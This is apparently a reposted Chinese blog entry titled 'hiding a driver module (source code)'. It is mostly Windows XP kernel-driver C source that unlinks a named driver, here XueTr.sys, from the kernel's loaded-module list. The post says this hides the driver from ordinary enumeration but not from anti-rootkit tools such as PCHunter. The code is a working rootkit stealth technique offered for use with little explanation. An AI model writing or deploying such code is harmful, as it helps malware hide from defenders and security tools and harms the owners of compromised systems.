生活随笔
收集整理的這篇文章主要介紹了
隐藏驱动模块(源码)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
XP親測有效,使用我們自己編寫的枚舉驅動模塊會看不到。枚舉驅動模塊請看文章?http://blog.csdn.net/liujiayu2/article/details/72822478
但是使用ARK工具依然能看到我們隱藏的驅動某塊,比如kernel detective 和PChunter 但是隱藏的驅動模塊為紅色,意為ARK工具檢測到了該模塊進行了隱藏
#include?<ntddk.h>?? ?? typedef?unsigned?long?DWORD;?? ?? typedef?struct?_KLDR_DATA_TABLE_ENTRY?{?? ????LIST_ENTRY?InLoadOrderLinks;?? ????PVOID?ExceptionTable;?? ????ULONG?ExceptionTableSize;?? ????PVOID?GpValue;?? ????DWORD?UnKnow;?? ????PVOID?DllBase;?? ????PVOID?EntryPoint;?? ????ULONG?SizeOfImage;?? ????UNICODE_STRING?FullDllName;?? ????UNICODE_STRING?BaseDllName;?? ????ULONG?Flags;?? ????USHORT?LoadCount;?? ????USHORT?__Unused5;?? ????PVOID?SectionPointer;?? ????ULONG?CheckSum;?? ????PVOID?LoadedImports;?? ????PVOID?PatchInformation;?? }?KLDR_DATA_TABLE_ENTRY,?*PKLDR_DATA_TABLE_ENTRY;?? ?? PDRIVER_OBJECT?pDriverObject?=?NULL;?? ?? VOID??? HideDriver()?? {?? ????PKLDR_DATA_TABLE_ENTRY?entry?=(PKLDR_DATA_TABLE_ENTRY)pDriverObject->DriverSection;?? ????PKLDR_DATA_TABLE_ENTRY?firstentry;?? ????UNICODE_STRING?uniDriverName;?? ?????? ????firstentry?=?entry;?? ?? ?????? ????RtlInitUnicodeString(&uniDriverName,?L"XueTr.sys");?? ?????? ????while((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink?!=?firstentry)?? ????{?? ????????if?(entry->FullDllName.Buffer?!=?0)?? ????????{?????? ????????????if?(RtlCompareUnicodeString(&uniDriverName,?&(entry->BaseDllName),?FALSE)?==?0)?? ????????????{?? ????????????????KdPrint(("隱藏驅動?%ws?成功!\n",?entry->BaseDllName.Buffer));?????? ?????????????????? ????????????????*((DWORD*)entry->InLoadOrderLinks.Blink)?=?(DWORD)entry->InLoadOrderLinks.Flink;?? ????????????????entry->InLoadOrderLinks.Flink->Blink?=?entry->InLoadOrderLinks.Blink;?? ?????????????????? ????????????????? ? ? ? ? ? ? ?? ????????????????entry->InLoadOrderLinks.Flink?=?(LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);?? ????????????????entry->InLoadOrderLinks.Blink?=?(LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);?? ?? ????????????????break;?? ????????????}?? ????????}?? ?????????? ????????entry?=?(PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;?? ????}?? }?? ?? NTSTATUS??? UnloadDriver(?? ?????????????IN?PDRIVER_OBJECT?DriverObject?? ?????????????)?? {?? ????return?STATUS_SUCCESS;?? }?? ?? NTSTATUS??? DriverEntry(?? ????????????IN?PDRIVER_OBJECT?DriverObject,??? ????????????IN?PUNICODE_STRING??RegistryPath?? ????????????)?? {?? ????DriverObject->DriverUnload?=?UnloadDriver;?? ????pDriverObject?=?DriverObject;?? ????HideDriver();?? ????return?STATUS_SUCCESS;?? }?
總結
以上是生活随笔為你收集整理的隐藏驱动模块(源码)的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。
